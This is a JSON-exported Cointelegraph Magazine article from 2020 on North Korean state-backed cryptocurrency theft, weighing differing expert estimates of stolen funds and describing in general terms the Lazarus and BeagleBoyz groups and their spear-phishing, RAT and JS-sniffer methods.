{"id":6342,"date":"2020-10-09T10:38:24","date_gmt":"2020-10-09T14:38:24","guid":{"rendered":"https:\/\/cointelegraph.com\/magazine\/?p=6342"},"modified":"2020-10-09T10:38:24","modified_gmt":"2020-10-09T14:38:24","slug":"north-korean-crypto-hacking-separating-fact-from-fiction","status":"publish","type":"post","link":"https:\/\/cointelegraph.com\/magazine\/2020\/10\/09\/north-korean-crypto-hacking-separating-fact-from-fiction","title":{"rendered":"North Korean crypto hacking: Separating fact from fiction"},"content":{"rendered":"

The Democratic People’s Republic of Korea<\/strong> is widely considered to be a state sponsor of cryptocurrency hacking and theft.<\/strong> While multiple United States presidents have attempted to stifle the growth of North Korean nuclear energy development through a series of economic sanctions, cyber warfare is a new phenomenon that can\u2019t be dealt with in a traditional way.\u00a0<\/span><\/p>\n

Unfortunately for the crypto industry, DPRK has taken a liking to digital currencies and seems to be successfully escalating their operations around stealing and laundering cryptocurrencies to bypass crippling economic sanctions that have led to extreme poverty in the pariah state.<\/span><\/p>\n

Some evidence suggests that Pyongyang has racked up well over two billion U.S. dollars from ransomware attacks, hacks, and even stealing crypto directly from the public through a spectrum of highly sophisticated phishing tricks. Sources explain that the regime employs various tactics to convert the stolen funds into crypto, anonymize it and then cash out through overseas operatives. All this activity has been given a name by the United States authorities \u2014 \u201chidden cobra.\u201d<\/span><\/p>\n

To achieve all this, not only does the operation need to be backed by the state, but many highly trained and skilled people have to be involved in the process to pull off the heists. So, does the DPRK indeed have the means and capability to engage in cyber warfare on a global scale, even as the country\u2019s leadership openly <\/span>admits<\/span><\/a> that the country is in a state of economic disrepair?<\/span><\/p>\n

How much exactly have the hackers stolen?<\/h4>\n

2020 continues the pattern of multiple updates<\/span> on how much money the DPRK-backed hackers have allegedly stolen. <\/span>A United Nations report from 2019 stated that North Korea has snatched around <\/span>$2 billion<\/span><\/a> from crypto exchanges and banks.\u00a0<\/span><\/p>\n

Most recent <\/span>estimates seem to indicate that the figure is around the $1.5<\/span><\/a> to <\/span>$2.5 billion<\/span><\/a> mark. These figures suggest that, although the exact data is hard to come by, the hacking efforts are on the rise and are bringing in more funds each year. <\/span>Furthermore, multiple reports of <\/span>new ransomware, elaborate hacks and novel ransomware methods<\/span><\/a>, only supports this data.<\/span><\/p>\n

Madeleine Kennedy, <\/span>senior director of communications at crypto forensics firm Chainalysis told Cointelegraph that the lower estimate is likely understated: <\/span><\/p>\n

We are confident they have stolen upwards of $1.5B in cryptocurrency. It seems likely that DPRK invests in this activity because these have been highly successful campaigns.<\/span><\/p><\/blockquote>\n

However, Rosa Smothers, senior vice president at KnowBe4 cyber security firms and a former CIA technical intelligence officer, told Cointelegraph that despite the <\/span>recent accusations from the United States Department of Justice<\/span><\/a> that North Korean hackers stole nearly $250 million from two crypto exchanges, the total figure may not be as high, adding: \u201cGiven Kim Jong Un’s recent public admission of the country’s dismal economic situation, $1.5B strikes me as an overestimate.\u201d<\/span><\/p>\n

How do the hacking groups operate?<\/h4>\n

It\u2019s not very clear how exactly those North Korean hacking groups organized and where they are based, as none of the reports paint a definitive picture. Most recently, the <\/span>U.S. Department of Homeland Security stated that a new DPRK-sponsored hacking group, <\/span>BeagleBoyz, is now active on the international scene<\/span><\/a>. The agency suspects the gang to be a separate, but affiliated entity to the infamous Lazarus group, which is rumored to be behind several high profile cyber attacks. DHS believes that BeagleBoyz have attempted to steal almost $2 billion since 2015, mostly targeting banking infrastructure such as ATMs and the SWIFT system.<\/span><\/p>\n

According to Ed Parsons, managing director UK of F-Secure, \u201cThe \u2018BeagleBoyz\u2019 appears to be the U.S. government name for a recent cluster of activity targeting financials in 2019\/2020,\u201d adding that it\u2019s unknown if the unit is new or \u201ca new name attached to an initially unattributed campaign that was then later linked to DPRK activity.\u201d He further told Cointelegraph that the malware samples were associated with those under the \u201chidden cobra\u201d codename, which is a term used by the U.S. government to identify DPRK online activity.\u00a0<\/span><\/p>\n

According to the U.S. Security & Infrastructure Security Agency, the hidden cobra-related activity was flagged in 2009 and initially aimed to exfiltrate information or disrupt the processes. The main <\/span>vectors<\/span><\/a> of attack are \u201cDDoS botnets, keyloggers, remote access tools (RATs), and wiper malware,\u201d targeting the older versions of Microsoft\u2019s Windows and Adobe software. Most notably, the hidden cobra actors make use of the DDoS botnet infrastructure, known as the DeltaCharlie, which is associated with over 600 IP addresses.<\/span><\/p>\n

John Jefferies, chief financial analyst at CipherTrace, a blockchain forensics company, told Cointelegraph that there are several prominent hacking groups and it\u2019s extremely difficult to differentiate between them. <\/span>Anastasiya Tikhonova, head of APT Research at Group-IB, a cybersecurity company,<\/span> echoed the sentiment saying that regardless of the group name attached, the attack vectors are very similar:<\/span><\/p>\n

\u201cInitial access to targeted financial organizations is gained using spear phishing \u2014 either via emails with a malicious document masquerading as a job offer or via personal message on social media from a person pretending to be a recruiter. Once activated the malicious file downloads the NetLoader.\u201d<\/span><\/p>\n

Additionally, several experts have outlined JS-sniffers as the latest thread to emerge, most commonly linked to the Lazarus group. JS-sniffers is a malicious code which was designed to steal payment data from small online stores, an attack in which all the parties who engaged in the transaction would have their personal information exposed.<\/span><\/p>\n

 <\/p>\n